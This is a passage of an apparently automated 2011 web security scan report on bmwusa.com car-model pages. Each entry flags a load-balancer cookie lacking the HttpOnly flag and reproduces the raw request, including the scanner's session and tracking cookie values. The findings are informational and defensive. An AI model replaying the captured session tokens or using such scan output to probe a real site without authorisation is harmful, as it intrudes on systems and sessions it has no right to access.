Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:06:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:26:47 GMT;path=/
Content-Length: 227188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.301. http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/740isedan/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:26:35 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/740isedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:06:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:26:35 GMT;path=/
Content-Length: 215341

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.302. http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/modelhighlights/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/740isedan/modelhighlights/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:26:30 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/740isedan/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:06:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:26:30 GMT;path=/
Content-Length: 215342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.303. http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/7seriessedanmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/740lisedan/7seriessedanmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:30:29 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/740lisedan/7seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:10:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:30:29 GMT;path=/
Content-Length: 202193

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.304. http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/740lisedan/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:31:18 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/740lisedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:11:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:31:18 GMT;path=/
Content-Length: 212920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.305. http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/740lisedan/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:29:48 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/740lisedan/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:09:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:29:48 GMT;path=/
Content-Length: 212921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.306. http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/740lisedan/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:31:09 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/740lisedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:11:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:31:09 GMT;path=/
Content-Length: 227711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.307. http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/features_and_specs/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/740lisedan/features_and_specs/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:30:32 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/740lisedan/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:10:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:30:32 GMT;path=/
Content-Length: 227712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.308. http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/740lisedan/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:30:09 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/740lisedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:10:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:30:09 GMT;path=/
Content-Length: 215455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.309. http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/modelhighlights/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/740lisedan/modelhighlights/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:30:08 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/740lisedan/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:10:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:30:08 GMT;path=/
Content-Length: 215456

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.310. http://www.bmwusa.com/standard/content/vehicles/2011/7/750isedan/7seriessedanmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750isedan/7seriessedanmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:34:33 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750isedan/7seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:14:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:34:33 GMT;path=/
Content-Length: 202156

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.311. http://www.bmwusa.com/standard/content/vehicles/2011/7/750isedan/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750isedan/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:32:03 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750isedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:12:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:32:03 GMT;path=/
Content-Length: 212689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.312. http://www.bmwusa.com/standard/content/vehicles/2011/7/750isedan/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750isedan/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:34:37 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750isedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:14:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:34:37 GMT;path=/
Content-Length: 228030

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.313. http://www.bmwusa.com/standard/content/vehicles/2011/7/750isedan/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750isedan/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:34:30 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750isedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
